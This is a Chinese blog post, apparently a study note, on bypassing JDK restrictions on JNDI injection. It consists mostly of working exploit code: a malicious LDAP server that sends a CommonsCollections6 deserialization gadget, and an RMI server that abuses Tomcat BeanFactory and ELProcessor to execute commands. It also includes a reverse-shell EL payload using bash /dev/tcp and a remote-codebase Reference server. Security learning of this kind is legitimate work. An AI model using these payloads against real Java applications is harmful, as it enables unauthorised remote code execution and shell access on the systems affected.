JNDI注入高版本绕过学习

最新推荐文章于 2024-07-30 16:57:31 发布
最新推荐文章于 2024-07-30 16:57:31 发布
阅读量264 收藏
点赞数
文章标签: 学习 java tomcat struts spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/why811/article/details/132711773
版权

JNDI(Java Naming and Directory Interface)是一个应用程序设计的 API,一种标准的 Java 命名系统接口。JNDI 提供统一的客户端 API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将 JNDI API 映射为特定的命名服务和目录系统,使得 Java 应用程序可以和这些命名服务和目录服务之间进行交互。

协议作用
LDAP轻量级目录访问协议,约定了 Client 与 Server 之间的信息交互格式、使用的端口号、认证方式等内容
RMIJAVA 远程方法协议,该协议用于远程调用应用程序编程接口,使客户机上运行的程序可以调用远程服务器上的对象
DNS域名服务
CORBA公共对象请求代理体系结构

高版本绕过主要有两种方式:

  • LDAP Server 直接返回恶意序列化数据,但需要目标环境存在 Gadget 依赖
  • 使用本地 Factory 绕过(主要是利用了 org.apache.naming.facotry.BeanFactory 类)

直接返回序列化数据

利用

LDAP Server 可以直接改 marshalsec 里面的:

public class LDAPServer {

    private static final String LDAP_BASE = "dc=example,dc=com";

    public static void main(String[] args) {
        String[] tmpArgs = new String[]{"http://localhost:9999/#Calc"};
        int port = 8888;
        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                    "listen", //$NON-NLS-1$
                    InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
                    port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(tmpArgs[0])));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
            ds.startListening();

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;


        /**
         *
         */
        public OperationInterceptor(URL cb) {
            this.codebase = cb;
        }


        /**
         * {@inheritDoc}
         *
         * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
         */
        @Override
        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            } catch (Exception e1) {
                e1.printStackTrace();
            }

        }


        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) throws Exception {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "foo");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if (refPos > 0) {
                cbstring = cbstring.substring(0, refPos);
            }
            /*
            e.addAttribute("javaCodeBase", cbstring);
            e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
            e.addAttribute("javaFactory", this.codebase.getRef());
             */

            // send serial data
            e.addAttribute("javaSerializedData", getCommonsCollections6());
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }

        static byte[] getCommonsCollections6() throws Exception {
            TemplatesImpl templates = Utils.creatTemplatesImpl(Calc.class);
            Transformer invokerTransformer = new InvokerTransformer("getClass", null, null);
            Map innerMap = new HashMap();
            Map outerMap = LazyMap.decorate(innerMap, invokerTransformer);
            TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, templates);
            HashMap expMap = new HashMap();
            expMap.put(tiedMapEntry, "value");
            outerMap.clear();
            Utils.setFieldValue(invokerTransformer, "iMethodName", "newTransformer");

            return Utils.serialize(expMap);
        }

    }
}
> javac Calc.java
> python3 -m http.server 9999

客户端 lookup 方法参数可控:

简单分析

(ObjectInputStream#readObject --> ... --> Runtime.getRuntime.exec('calc'))
deserializeObject:528, Obj (com.sun.jndi.ldap)
decodeObject:239, Obj (com.sun.jndi.ldap)
c_lookup:1051, LdapCtx (com.sun.jndi.ldap)
p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)
lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)
lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)
lookup:94, ldapURLContext (com.sun.jndi.url.ldap)
lookup:417, InitialContext (javax.naming)
main:8, JNDIClient (JNDI.bypass1)

Obj#decodeObject 方法里:

如果 var0.JAVA_ATTRIBUTES[1] 不为 null,则会进入 Obj#deserializeObject 方法中去,我们来看 JAVA_ATTRIBUTES 的定义:

static final String[] JAVA_ATTRIBUTES = new String[]{"objectClass", "javaSerializedData", "javaClassName", "javaFactory", "javaCodeBase", "javaReferenceAddress", "javaClassNames", "javaRemoteLocation"};

对应下标为 1 的是 javaSerizlizedData,而这里的 var0 是 LDAP 服务端发送的 Attributes(可控),所以在服务端把这个属性和恶意的序列化数据绑定:

// LDAP Server

e.addAttribute("javaSerializedData", getCommonsCollections6());

然后进入 Obj#deserializeObject 方法,直接进行了反序列化:

本地 Factory 绕过

在 Reference 类中的 factory Class,要求实现 ObjectFactory 接口,在 "NamingManager#getObjectFactoryFromReference" 方法中的逻辑是这样的:

  1. 优先从本地加载 factory,这就要求 factory Class 在本地的 ClassPath 中
  2. 本地加载不到会从 codebase 处加载,但是由于高版本 jdk 默认不信任 codebase,在一般情况下无法利用
  3. 在加载完 factory 之后会强制类型转换为 javax.naming.spi.ObjectFactory 接口类型,之后调用 factory.getObjectInstance() 方法

所以如果找可以利用的 factory 就要满足下面的要求:

  • 在目标的 ClassPath 中,且实现了 javax.naming.spi.ObjectFactory 接口
  • getObjectInstance 方法可以被利用

这个可用的 factory 类为 org.apache.naming.BeanFactory,位于 tomcat 的依赖包中,此外,这个 factory 绕过需要搭配 javax.el.ELProcessor 来完成 RCE,依赖:

<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-catalina</artifactId>
    <version>8.5.0</version>
</dependency>

<!-- 加载ELProcessor时需要 -->
<dependency>
    <groupId>org.apache.tomcat.embed</groupId>
    <artifactId>tomcat-embed-el</artifactId>
    <version>8.5.0</version>
</dependency>

分析

来到 BeanFactory#getObjectInstance 方法中(太长不放图了- -)

这里的代码逻辑比较复杂,简单可以概括为以下几点:

  • BeanFactory#getObjectInstance 要求传入了 Reference 必须为 ResourceRef 的实例
  • BeanFactory 通过反射创建了一个 Bean,这个 Bean 的类名、属性、属性值都来自于 Reference 对象,我们可控
  • 在注入 Bean 的属性的时候会调用对应的 setter 方法,这个 setter 方法不一定为 set... 形式,通过 ResourceRef 对象中的一个魔法属性 forceString ,可以把任意 public 方法转化为该属性 setter 方法。
  • 这个 public 方法的参数类型必须为 String.class

可以利用的方法为 javax.el.ELProceor#eval 方法,这个方法可以执行任意的 EL 表达式。

Expliot

EL 表达式利用 JS 引擎执行命令:

String el = "''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")";
// 反弹shell
String el = "''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/bash','-c','bash -i >& /dev/tcp/ip/port 0>&1']).start()\")";
public class RMIServer {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
        StringRefAddr sr1 = new StringRefAddr("forceString", "X=eval");
        String el = "''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")";
        StringRefAddr sr2 = new StringRefAddr("X", el);
        ref.add(sr1);
        ref.add(sr2);
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
        registry.bind("pwn", referenceWrapper);
    }
}
public class JNDIClient {
    public static void main(String[] args) throws Exception {
        String url = "rmi://localhost:1099/pwn";
        InitialContext context = new InitialContext();
        context.lookup(url);
    }
}

扩展

InitialContext类

由 JNDI+RMI 漏洞代码进行分析

package jndi_rmi_injection;

import javax.naming.InitialContext;
import javax.naming.NamingException;
public class RMIClient {
    public static void main(String[] args) throws NamingException{
        String uri = "rmi://127.0.0.1:7778/RCE";
        InitialContext initialContext = new InitialContext();
        initialContext.lookup(uri);
    }
}

InitialContext 类用于读取 JNDI 的一些配置信息,内含对象和其在 JNDI 中的注册名称的映射信息

InitialContext initialContext = new InitialContext(); // 初始化上下文,获取初始目录环境的一个引用

lookup(String name) 获取 name 的数据,这里的 uri 被定义为 rmi://127.0.0.1:7778/RCE 所以会通过 rmi 协议访问 127.0.0.1:7778/RCE

String uri = "rmi://127.0.0.1:7778/RCE";
initialContext.lookup(uri); //利用lookup() 函数获取指定的远程对象

由于 lookup() 参数可控,导致漏洞的出现,跟进代码如下

Reference 类

Reference 是一个抽象类,每个 Reference 都有一个指向的对象,对象指定类会被加载并实例化。
由 JNDI+RMI 服务端攻击代码

package jndi_rmi_injection;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.Reference;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

public class RMIServer {
    public static void main(String[] args) throws Exception{
        Registry registry = LocateRegistry.createRegistry(7778);
        Reference reference = new Reference("Calculator","Calculator","http://127.0.0.1:8081/");
        ReferenceWrapper wrapper = new ReferenceWrapper(reference);
        registry.bind("RCE",wrapper);
    }

}

reference 指定了一个 Calculator 类,于远程的 http://127.0.0.1:8081/ 服务端上,等待客户端的调用并实例化执行。

Reference reference = new Reference("Calculator","Calculator","http://127.0.0.1:8081/");

why811
关注
Java反序列化(之)JNDI注入绕过版本限制
Vicl1fe的博客
12-30 984
前言 JNDI注入绕过版本限制已经被别人玩烂了,我才开始学。参考文章写的特别好。 本文大部分参考https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html JNDI注入 暂时只了解到 JNDI注入分为如下几类 RMI Remote Object Payload(限制较多,不常使用) RMI + JNDI Reference Payload LDAP + JNDI Reference Payload CORBA攻击
Java代码审计】JNDI+RMI绕过版本JDK的限制
大河之犬的博客
03-08 1007
传入的 Reference为 ResourceRef 类,后面通过反射的方式实例化 Reference 所指向的任意 Bean Class,调用 setter 方法为所有的属性赋值,该 Bean Class 的类名、属性、属性值,全都来自于 Reference 对象。因此,实际上我们可以调用任意指定类的任意方法,并指定单个可控的参数。因此,我们实际上可以指定一个存在于目标 classpath 中的工厂类名称,交由这个工厂类去实例化实际的目标类(即引用所指向的类),从而间接实现一定的代码控制。
绕过版本JDK限制的JNDI注入
weixin_45682070的博客
01-21 1778
前言 JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。 JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.obj
JDK版本JNDI注入绕过
wfz2333的博客
05-22 1323
只启用RMI服务时,这时候RMI客户端能够去打服务端,有两种情况,第一种就是利用服务端本地的gadget,具体要看服务端pom.xml文件比如yso中yso工具中已经集合了很多gadget chain本地利用yso的打rmi注册表的模块 此时在jdk1.7.0_21和jdk1.7.0_25以及jdk1.8.0上都可以成功,然而在一次攻击内网rmi服务的深思这篇文章中说到jdk8u121以后进行了一定的限制 jdk1.8.0_121测试如下:这种防御机制即JEP290,在jdk8u121提出的,简单来说就
JNDI注入+版本绕过+工具使用
GalaxySpaceX的博客
06-21 2756
JNDI注入+版本绕过+工具使用
JNDI注入-版本绕过
最新发布
07-30 997
上面讲到了RMI,CORBA,LDAP漏洞被修复了,漏洞出现在客户端拿到Reference后,通过Reference加载codeBase路径下的factory处。下图是从拿到的Reference中获取factory(BeanFactory),之后调用BeanFactory的getObjectInstance方法。获取Reference的ClassName(javax.el.ELProcessor),并loadClass,得到ELProcessor类。修复之前,利用是在LdapCtx.java中的。
JNDI注入版本绕过
yangyangrenren的专栏
12-22 2607
转载于JNDI注入版本绕过 JDNI利用方式的修复之路 RMI Remote Object Payload(限制多,不常使用) 攻击者实现一个RMI恶意远程对象并绑定到RMI Registry上,编译后的RMI远程对象类可以放在HTTP/FTP/SMB等服务器上,供受害者的RMI客户端远程加载。RMI客户端在 lookup() 的过程中,会先尝试在本地CLASSPATH中去获取对应的Stub类的定义,并从本地加载,然而如果在本地无法找到,RMI客户端则会向远程Codebase去获取攻击者指定的恶意对象,这
第二届N1CTF Web Derby wp jndi注入通过Druid绕过版本jdk打Derby Rce(2)
m0_54903333的博客
05-04 630
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护。
Bypass JNDI版本限制
01-15 660
老早就知道 JNDI 注入存在版本限制且有相应的绕过手法了,今天来分析分析绕过版本限制的两种手法!
JNDI注入版本绕过——实验分析
yangyangrenren的专栏
12-22 2641
原文是: JNDI注入版本绕过 JNDI注入版本绕过 对文章中的“利用LDAP返回序列化数据,触发本地Gadget绕过版本限制”内容,LDAP_Server代码做实验,其原理就是:启动了一个内存LDAP数据库。 LDAP内存数据库验证: 可以采用两种方式验证,方式一是借助Apache Directory Studio软件,与内存LDAP数据库建立连接。方式二是使用代码读取。 (1) 方式一 (2)方式二 import javax.naming.Context; import javax.nami
tomcat下jdk版本JNDI注入解析
b1ackc4t的博客
03-12 577
前言 经典的JNDI注入在jdk8u191以上的版本默认被限制了加载远程工厂类,但可以通过加载一些特殊的本地工厂,达到执行命令的效果 比如常见的tomcat依赖里的BeanFactory就能实现类似的效果 经典payload 服务端 package org.example.rmi; import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.NamingException; import javax.naming.Refe
Java安全』绕过JDK版本限制进行JNDI注入学习研究
Ho1aAs‘s Blog
02-22 2845
文章目录绕过原理使用本地类作为恶意工厂攻击RMI探究BeanFactory类pom.xmlPoCjavax.el.ELProcessorGroovy.lang.GroovyShell引用参考完 绕过原理 对于JDK版本11.0.1、8u191、7u201、6u211及以上,RMI和LDAP的trustURLCodebase已经被限制,但是还存在几种方法绕过 使用受害者本地的类作为恶意Reference Factory攻击RMI 利用LDAP返回序列化数据触发Gadget 使用本地类作为恶意工厂攻击RMI
版本JDK下绕过受限JNDI注入进行任意类加载
qq_40466372的博客
07-18 1212
版本JDK下JNDI配合Unsafe实现加载任意类
通过Tomcat BeanFactory 绕过版本JDK CodeBase限制实现JNDI注入
Armandhe的博客
05-22 473
通过Tomcat BeanFactory 绕过版本JDK CodeBase限制实现JNDI注入
JNDI注入利用原理绕过版本JDK限制
mole_exp的博客
11-07 7663
文章目录前言JNDI 101什么是JNDI使用JNDI的好处几个简单的JNDI代码示例1、使用JNDI操作RMI2、使用JNDI操作LDAPJNDI动态协议转换JNDI Naming ReferencesJNDI 注入利用RMI向量LDAP向量其他向量绕过版本JDK限制方式1、利用本地Class作为JNDI Reference Factory方式2、LDAP Server返回序列化数据,触发本地反序列化Gadget坑Reference 前言 关于JNDI注入的讨论和研究,起源于国外的安全研究员@pwnte
安全技术系列之JNDI注入
好记性不如烂笔头
09-28 5791
JDNI注入总结
Java 安全-JNDI注入学习
Townmacro的博客
05-23 1481
背景知识 JNDI Service Provider JNDIJNDI Service Provider 的关系类似于 Windows 中 SSPI 与 SSP 的关系。前者是统一抽象出来的接口,而后者是对接口的具体实现。如默认的 JNDI Service Provider 有 RMI/LDAP 等等。 ObjectFactory 每一个 Service Provider 可能配有多个 Object Factory。Object Factory 用于将 Naming Service(如 RMI/L
037-安全开发-JavaEE应用&JNDI注入&RMI服务&LDAP服务&JDK绕过&调用链类
wushangyu32335的博客
02-17 1449
小迪安全2023笔记
InitialContext与lookup
weixin_33953249的博客
11-17 3721
Context initial = new InitialContext(); Object objref = initial.lookup("java:comp/env/ejb/SimpleConverter");     一般情况下,intial.lookup("")中的参数就是你的JNDI名称。但是用的应用服务器,是把JNDI名放到java:comp/env/ejb/后面的。两种方式都没有错...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值